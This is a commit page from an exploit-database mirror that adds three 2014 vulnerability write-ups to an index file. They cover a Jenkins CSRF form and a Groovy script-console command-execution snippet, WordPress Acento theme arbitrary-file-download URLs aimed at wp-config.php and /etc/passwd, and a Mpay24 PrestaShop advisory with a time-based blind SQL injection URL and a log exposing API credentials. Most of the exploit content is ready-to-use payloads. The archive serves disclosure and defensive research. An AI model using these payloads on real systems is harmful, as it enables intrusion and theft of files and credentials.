bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 09_10_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-10 04:44:48 +00:00
parent d0930d2156
commit 38f34a5333
5 changed files with 274 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -31136,3 +31136,6 @@ id,file,description,date,author,platform,type,port
34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 'nusoap.php' Cross Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090

Can't render this file because it is too large.

56
platforms/multiple/webapps/34587.txt Executable file
View file

@ -0,0 +1,56 @@
#Affected Vendor: http://jenkins-ci.org/
#Date: 03/09/2014
#Discovered by: JoeV
#Type of vulnerability: CSRF and Command Execution
#Tested on: Windows 7
#Version : 1.578
#Description: Jenkins is susceptible to CSRF attack and command
execution. Using groovy one can fire any command and get it executed
by the script console thus able to access files, registry keys, values
and folders which is outbound for Jenkins.
#CSRF
--------
#Payload:
<form method="POST" name="form0"
action="http://localhost:8090/credential-store/createDomain">
<input type="hidden" name="_.name" value="xyz"/>
<input type="hidden" name="description" value="abc"/>
<input type="hidden" name="json" value="{'name': 'xyz', 'description': 'abc'}"/>
<input type="hidden" name="Submit" value="OK"/>
</form>
Command Execution (/script)
-------------------------------------
ArrayList pids = null
PrintWriter writer = null
File f = new File("C:/Windows/System32/Services.msc")
if (f.length() > 0){
pids = new ArrayList()
f.eachLine { line -> pids.add(line) }
println("Item to be removed: " + pids.get(0))
testRunner.testCase.setPropertyValue( "personId", pid )
pids.remove(0)
println pids
writer = new PrintWriter(f)
pids.each { id -> writer.println(id) }
writer.close()
}
else{
println "Null"
}
--
Regards,
*Joel V*

2
platforms/php/webapps/34552.txt
View file

@ -1,5 +1,7 @@
Title: LoadedCommerce7 Systemic Query Factory Vulnerability Title: LoadedCommerce7 Systemic Query Factory Vulnerability
Advisory: http://breaking.technology/advisories/CVE-2014-5140.txt
Credits: Discovered by Breaking Technology Research Labs 2014-06-30 Credits: Discovered by Breaking Technology Research Labs 2014-06-30
Reference: CVE-2014-5140 - Assigned 31 June 2014 Reference: CVE-2014-5140 - Assigned 31 June 2014

34
platforms/php/webapps/34578.txt Executable file
View file

@ -0,0 +1,34 @@
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress acento theme Arbitrary File Download Vulnerability
# Author : alieye
# vondor : http://www.wpbyexample.com/detail/acentocultural.com
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Date: 01/09/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
You can download any file from your target ;)
exploit: http://victim.com/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
Demo:
1-download wp-config.php file from site:
http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/homepages/44/d398221315/htdocs/wp-config.php
2-download passwd file from root:
http://server/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

179
platforms/php/webapps/34586.txt Executable file
View file

@ -0,0 +1,179 @@
Mpay24 PrestaShop Payment Module Multiple Vulnerabilities
- · Affected Vendor: Mpay24
- · Affected Software: Mpay24 Payment Module
- · Affected Version: 1.5 and earlier
- · Issue Type: SQL injection and information disclosure
- · Notification Date: 10 February 2014
- · Release Date: 03 September 2014
- · Discovered by: Eldar Marcussen
- · Issue status: Patch available
Summary
BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
two high impact vulnerabilities in the Mpay24 payment module for the
Prestashop e-commerce solution.
“Mpay24 is the online-payment platform for e- and m-commerce combines
frequently used and innovative payment systems in one single interface”. [
www.mpay24.com]
“Prestashop is the free ecommerce solution to start your online business
and start selling online. Build an online store for free with Prestashop.” [
www.prestashop.com]
Pre-Authentication Blind SQL Injection Requires
Mpay24 payment module present on the website.
CVE identifier
CVE-2014-2008
Description
The Mpay24 plugin version 1.5 and earlier does not sufficiently filter or
escape user supplied data used in database queries resulting in SQL
injection vulnerabilities.
The following blind SQL injection vulnerability is caused by user supplied
data being used directly in a database query, as evidenced by the offending
code:
confirm.php:12: Db::getInstance()->Execute("
confirm.php:13: UPDATE `"._DB_PREFIX_."mpay24_order` SET
confirm.php:14: `MPAYTID` = ".$_REQUEST['MPAYTID'].",
confirm.php:15: `STATUS` = '".$_REQUEST['STATUS']."'
confirm.php:16: WHERE `TID` = '".$_REQUEST['TID']."'
confirm.php:17: ");
Impact
Using this vulnerability, BAE Systems was able to extract information
directly from the database, bypassing any restrictions that may be enforced
by the application.
Proof of Concept
The following URL introduces an artificial delay in the page response time
which can be used by an attacker to extract data from the database:
http://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
Recommendation
Use prepared statements to ensure the structure of the database query
remains intact.
Pre-Authentication Information Disclosure Requires
Mpay24 configured with debug enabled (default value until version 1.6).
CVE identifier
CVE-2014-2009
Description
The Mpay24 plugin logs raw curl requests and other debugging information to
the payment gateway by default. This log file is publicly accessible and
contains information valuable to an attacker, including the base64 encoded
credentials used by the merchant to access the Mpay24 API.
Impact
Using this vulnerability, BAE Systems was able to obtain Mpay24 API
credentials and the local path of the Prestashop installation. The attacker
can use the API credentials to hijack the merchants API access and leverage
the local path disclosure with other exploits.
Proof of Concept
URL: http://target/path/modulesmapy24/api/curllog.log
* About to connect() to test.mpay24.com port 443 (#0)
* Trying 213.164.23.169...
* connected
* Connected to test.mpay24.com (213.164.23.169) port 443 (#0)
* successfully set certificate verify locations:
* CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem
CApath: /etc/ssl/certs
* SSL connection using DHE-RSA-AES256-GCM-SHA384
* Server certificate:
* subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH;
OU=EuropeanSSL Single; CN=test.mpay24.com
* start date: 2013-05-13 00:00:00 GMT
* expire date: 2015-05-13 23:59:59 GMT
* subjectAltName: test.mpay24.com matched
* issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA
* SSL certificate verify ok.
* Server auth using Basic with user 'u91234'
> POST /app/bin/etpproxy_v15 HTTP/1.1
Authorization: Basic dTkxMjM0OlNPQVAxMjM=
User-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$)
Host: test.mpay24.com
Accept: */*
Content-Length: 423
Content-Type: application/x-www-form-urlencoded
* upload completely sent off: 423 out of 423 bytes
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 401 Authorization Required
< Date: Sun, 09 Feb 2014 21:04:21 GMT
< Server: Apache
* Authentication problem. Ignoring this.
< WWW-Authenticate: Basic realm="mPAY24 WebService"
< Content-Length: 401
< Content-Type: text/html; charset=iso-8859-1
<
* Connection #0 to host test.mpay24.com left intact
* Closing connection #0
Recommendation
Restrict access to webpages containing sensitive functionality or data to
authenticated users.
End User Recommendation
Update your Mpay24 plugin to version 1.6 or later.
Response Timeline
- 10/02/2014 Vendor notified
- 13/02/2014 Patch available through GitHub
- 19/02/2014 CVE identifiers assigned
03/09/2014 Advisory released